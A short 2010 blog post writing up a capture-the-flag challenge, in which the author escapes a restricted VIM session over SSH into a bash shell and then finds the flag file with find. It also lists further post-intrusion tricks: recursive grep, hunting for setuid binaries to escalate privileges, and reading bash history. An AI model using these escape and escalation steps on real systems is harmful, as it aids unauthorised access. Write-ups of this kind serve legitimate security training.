Tuesday, July 13, 2010

smpCTF challenge #2 write-up

Challenge #2 was similar to defcon trivial 200: you had to escape from a VIM editor, but this time it was not evil - you can see the screen.

We were given the following instructions:
ssh -l luser gordo.smpctf.com -p 2282 Password: smpctf
Help find waldo..

Once logged in SSH, we are in a VIM. Again, thanks to defcon trivial 200 we know what to do:
:set shell=/bin/bash

Then we have a shell:
bash-3.1$ id
uid=1005(luser) gid=103(levels) groups=103(levels)

From here, it's just exploration. We can start by using find:
bash-3.1$ find / -iname '*flag*' 2>/dev/null

Hmm, what's this?
bash-3.1$ ls -l /usr/lib/.flag
drwxr-xr-x  2 root root  4096 Jul  9 12:30 /usr/lib/.flag
bash-3.1$ cd /usr/lib/.flag
bash-3.1$ ls -al
total 64
drwxr-xr-x  2 root root  4096 Jul  9 12:30 .
drwxr-xr-x 69 root root 53248 Jul  9 12:30 ..
-rw-r--r--  1 root root    54 Jul  9 16:33 smp
bash-3.1$ cat smp
Challenge Key: cfc6adcc
Got it!

If we hadn't find it this way, in such a situation we could have used:
  • recursive grep:
    grep -Hirn flag /
  • find setuid/setgid binaries for privilege escalation:
    find / -local -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l '{}' \;
  • see files that were last modified on the filesystem:
    ls -alRt / |head
  • reading ~/.bash_history and other history or log files
  • up to your imagination :)

No comments:

Post a Comment